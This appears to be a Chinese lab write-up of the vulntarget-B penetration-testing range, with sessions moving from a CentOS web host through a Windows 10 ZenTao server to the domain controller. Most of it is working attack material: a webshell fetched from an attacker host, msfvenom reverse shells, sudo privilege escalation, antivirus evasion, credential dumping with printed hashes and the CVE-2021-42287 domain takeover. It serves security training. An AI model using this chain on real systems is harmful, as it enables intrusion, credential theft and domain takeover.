历史记录

    清空历史记录
    • 相关的动态
    • 相关的文章
    • 相关的用户
    • 相关的圈子
    • 相关的话题
    注册 登录
    vulntarget-B打靶记录
    bGl1 发表于 河北 渗透测试 575浏览 · 2024-08-22 12:51

    0x00 环境搭建

    https://mp.weixin.qq.com/s/uxwbnVOxkR8OBkkY9WW6aQ
    网络拓扑图

    0x01 Centos7

    1.1 信息搜集

    fscan扫一波

    ./fscan -h 192.168.239.111


    fscan将ssh密码扫出来.......还是走正常流程打,访问公网IP1回显是宝塔的页面,8888,888一顿测试没发现什么功能点先放这

    1.2 漏洞利用

    81端口访问是极致cms,有文件上传漏洞的0day,访问/admin.php/Plugins/update.html访问要登录
    随便测几个弱口令没成功对登录框进行抓包测试,验证码4位准备ddddocr与burp的插件联动爆破,突然发现验证码复用就省了这步,直接爆破出账号与密码为admin\admin123

    抓一个/admin.php/Plugins/update.html将paylaod放进去kali起个http服务,将a.php压缩为1.zip,密码为1

    POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.239.111:81
Content-Length: 87
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.239.111:81
Referer: http://192.168.239.111:81/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8bp7i3n8mdl3o0jhf9vq2tjq5c
Connection: close

action=start-download&filepath=dbrestore&download_url=http://192.168.239.130:8000/1.zip


    在发一个包将服务器存储1.zip文件的size拿到

    在发包请求解压1.zip,访问A/exts/a.php出现phpinfo攻击成功,蚁剑连接


    思路是:生成一个linux反向马放到/tmp/msf开启监听拿到shell,
    意外蚁剑执行命令没有成功,估计是开启disable_function

    1.3 蚁剑插件绕过disable_functions


    准备ip a/ifconfig查看网络信息时发现执行没有结果,这些命令没安装,这里介绍三种方法:

    1. hostname -I

    2. 直接查看网卡文件带 .ens

      cd  /etc/sysconfig/network-scripts/
ls |grep ens
cat ifcig-ens33
cat ifcig-ens77

    3. /sbin/ifconfig

      uname -a看操作系统及位数生成payload,
      Linux localhost.localdomain 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
      ### 1.4 msf监听上线
      生成反向shell放入/tmp目录注意shell.elf在tmp目录要加执行权限 chmod +x shell.elf
      msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.239.130 LPORT=4444 -f elf > shell.elf
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.239.130 #默认端口跟shell反弹端口一致不用修改
set autorunscript migrate -n explorer.exe  #自动将进程迁移至explorer下
set ExitOnSession false  #进程断了也保持监听
exploit -j -z
#-j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互)


      自动添加路由
      run post/multi/manage/autoroute
run autoroute -p
arp -a

      发现10.0.20.0网段,在shell执行命令时发现shell只能按shift+enter才能执行命令,切换交互式shell,有python环境,执行python -c 'import pty; pty.spawn("/bin/bash")'没有python可以用/usr/bin/script -qc /bin/bash /dev/null#切换为bash


    上传fscan到/tmp

    getlwd #显示攻击机目录,
lcd ./Desktop/tools #切换目录到tools
upload  ./fscan   /tmp/
chmod +x ./fscan #加执行权限
./fscan -h 10.0.20.0/24



    这里fscan扫描的时候发现没有回显结果,执行fscan有时间间隔猜测执行了命令,只是结果没回显过来将结果写到一个文件里面成功解决

    ./fscan -h 10.0.20.1/24 > 1.txt


    因为权限问题不能对外发ping包没有检测到其他主机,要提权先使用msf自带模块进行尝试

    1. 检测能用的exp
      use post/multi/recon/local_exploit_suggester
set session 5
run
    2. 使用linux/local/sudo_baron_samedit进行基于sudo的提权攻击虽然没有弹回shell,但是生成了具有root权限的msf账户
      use exploit linux/local/sudo_baron_samedit
options
set lport 5555#新的监听端口
set target 12
run

      使用msf\akeifiiymuaauvf进行ssh连接运行之前传过来的shell.elf成功弹回root权限的shell
      ssh msf@192.168.239.111# akeifiiymuaauvf

      终于提权成功,进行一波信息搜集为什么不使用nmap与fscan在总结时说明 
      use auxiliary/scanner/portscan/tcp
set rhost 10.0.20.0/24
set ports 21,22,80,445,1433,3389,6379,8080,1521
run

      发现10.0.20.66:8080为了方便工具利用将其出来8080端口转发出来,这里4dnat将内网10.0.20.66的8080端口转发到centos的7777端口,将4dnat上传到centos7的tmp目录执行
      upload ./tools/4dnat_linux/4dnat  /tmp/
chmod +x ./4dnat
./4dnat -forward  7777  10.0.20.66:8080 #将远程的8080绑定到本地的7777
      ## 0x02 win10
      ### 2.1 禅道CNVD-2020-121325
      访问192.168.239.111:7777,禅道cms看源码发现测试源码留下的密码............

      点击链接直接登录成功

    发现是禅道cms12.4.2版本,有# CNVD-2020-121325文件上传漏洞利用,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。

    1. 在centos7传一个1.php马
      python  -m SimpleHTTPServer  #在centos起http服务内网20.66可以访问下载
HTTP://10.0.20.30:8000/1.php 
# ip要内网ip,  base64编码为SFRUUDovLzEwLjAuMjAuMzA6ODAwMC8xLnBocA==
      这里显示需要admin权限

      使用admin/Admin123登录成功#社工拿到 
      http://192.168.239.111:7777/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6ODAwMC8xLnBocA==


      访问http://192.168.239.111:7777/data/client/1/1.php利用成功

      信息收集一波
    # 域: vulntarget.com
# 域控主机:WIN-UH20PRD3EAO
# 域控IP: 10.0.10.100

ipconfig /all
net group /domain
ping WIN-UH20PRD3EAO.vulntarget.com


    发现域控与win10在同一段下,思路正向马连接win10在横向域控

    上传木马成功但是在目录没有这个文件,怀疑安装杀软,将进程放到https://tasklist.pdsec.top/识别,安装了火绒


    2.2 免杀过火绒

    使用掩日的免杀工具进行免杀,成功免杀火绒

    msfvenom -p windows/x64/meterpreter/bind_tcp  lport=11001 -f exe >rw10.exe


    正向shell连不上,怀疑是防火墙的原因,使用netsh关闭防火墙权限不足,生成反向马进行连接

    #关闭win7防火墙
netsh firewall set opmode mode = disable
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.30 lport=11001 -f exe >rw10.exe

    免杀后成功上线

    use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp  

set lhost 10.0.20.30  #centos7的地址  
#设置端口号
set lport 11001
#开启监听
#设置自动迁移进程,这样在进程里面就找不到shell的进程了,将进程迁移到桌面进程里面
set autorunscript migrate -n explorer.exe
set ExitOnSession false
#让connection保持连接(即使一个连接退出,仍然保持listening状态)
run  -j -z
#-j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互)
run

    添加自动路由

    run post/multi/manage/autoroute 
arp -a


    当前为IIS APPPOOL\zentao用户权限低,进行提权

    getsystem


    上fscan扫一波域控没什么服务域控IP10.0.10.100

    0x03 win2016 server

    有MS17-010漏洞先直接打一波,使用msf自带ms17-010模块

    search ms17-010
use 0
set rhost 10.0.10.100 #目标ip
set lhost  10.0.10.99 #win10
run


    利用失败,尝试抓密码hash抓到win101NTML hash

    hashdump
load kiwi
creds_all

#Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4:::
#WIN10$    VULNTARGET  9d28b804217066ded1050aebe745d407  b6aa5d021dbd182457736e1d4be18a6a4e9995d9

#win101    VULNTARGET  282d975e35846022476068ab5a3d72df  bc9ecca8d006d8152bd51db558221a0540c9d604  8d6103509e746ac0ed9641f7c21d7cf7


    在somd5解密win101的NTML hash拿到 win101/admin#123

    3.1 修改注册表抓明文密码

    也可以使用修改注册表来抓明文密码,修改后需要win10重新登录,或注销

    reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

    3.2 PTH

    使用psexec与wmiexec,进行pth均未成功

    proxychains python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 ./Administrator@10.0.10.100

proxychains python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 Administrator@10.0.10.100

    3.2 CVE-2021-42287横向移动

    CVE-2021-42287原理:
    Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将域内的普通用户权限提升到域管理员权限等危害。

    use server/socks_tcp
run

proxychains4  python3 sam_the_admin.py vulntarget.com/win101:'admin#123' -dc-ip 10.0.10.100 -shell


    0x04 总结问题

    1. 使用fscan与nmap没扫出win10这个主机-Pn -np都试过不行,不知道为什么??
    2. 拿到域控win2016后想上传马到域控将shell转到msf里面没成功,win10没有python环境,使用netsh将win10的8000端口转发给centos的8000,在将centos的8000端口转发到kali的8000端口
    win2016-->win10:8000-->centos:8000-->kali:8000
 在kali:8000端口开启http服务,没成功shell还断开了


    3.横移没什么好方法

    0 人收藏 0 人喜欢 转载 分享
    0 条评论
    某人
    表情
    可输入 255
      发布投稿
    热门文章
    优秀作者
    目录
    先知社区
    本站/app由 Djingoii 提供技术和产品支持